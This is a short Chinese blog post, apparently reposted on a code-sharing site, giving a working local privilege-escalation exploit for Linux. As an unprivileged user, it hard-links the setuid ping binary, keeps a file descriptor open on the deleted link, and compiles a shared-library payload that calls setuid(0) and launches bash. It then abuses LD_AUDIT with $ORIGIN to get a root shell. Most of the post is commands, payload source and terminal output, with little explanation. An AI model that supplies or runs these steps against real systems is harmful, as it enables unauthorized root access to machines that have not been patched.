码迷,mamicode.com
首页 > 系统相关 > 详细

linux 系统漏洞提权

时间:2016-10-31 22:54:10      阅读:212      评论:0      收藏:0      [点我收藏+]

标签:linux

1、先用普通用户登录

su - user1

2、建立目录

mkdir /tmp/exploit/

3、利用Ping命令来建立硬链接

ln /bin/ping /tmp/exploit/target

查看权限

[[email protected] exploit]$ ll

total 40

-rwsr-xr-x. 2 root root 37928 Nov 12  2010 target

4、

exec 3< /tmp/exploit/target

ll /proc/$$/fd/3   ($$:当前进程id)

lr-x------. 1 user1 user1 64 Oct 31 12:16 /proc/21518/fd/3 -> /tmp/exploit/target

5、删除之前链接文件及目录

rm -rf /tmp/exploit/

[[email protected] tmp]$ ll /proc/$$/fd/3

lr-x------. 1 user1 user1 64 Oct 31 12:16 /proc/21518/fd/3 -> /tmp/exploit/target (deleted)

6、建立一个.c的c语言文件,代码如下:(注意空客及_个数)

cat /tmp/payload.c 

void __attribute__((constructor)) init()

{

        setuid(0);

        system("/bin/bash");

}

7、使用gcc执行,不显示任何报错即可

gcc -w -fPIC -shared -o /tmp/exploit payload.c

8、查看时,这个目录遍有了执行权限

ll -d /tmp/exploit 

-rwxrwxr-x. 1 user1 user1 6020 Oct 31 13:57 /tmp/exploit

LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3

本文出自 “silence” 博客,请务必保留此出处http://silencezone.blog.51cto.com/3613477/1867594

linux 系统漏洞提权

标签:linux

原文地址:http://silencezone.blog.51cto.com/3613477/1867594

(0)
(0)
   
举报
评论 一句话评论(0
0条  
登录后才能评论!
© 2014 mamicode.com 版权所有 京ICP备13008772号-2
迷上了代码!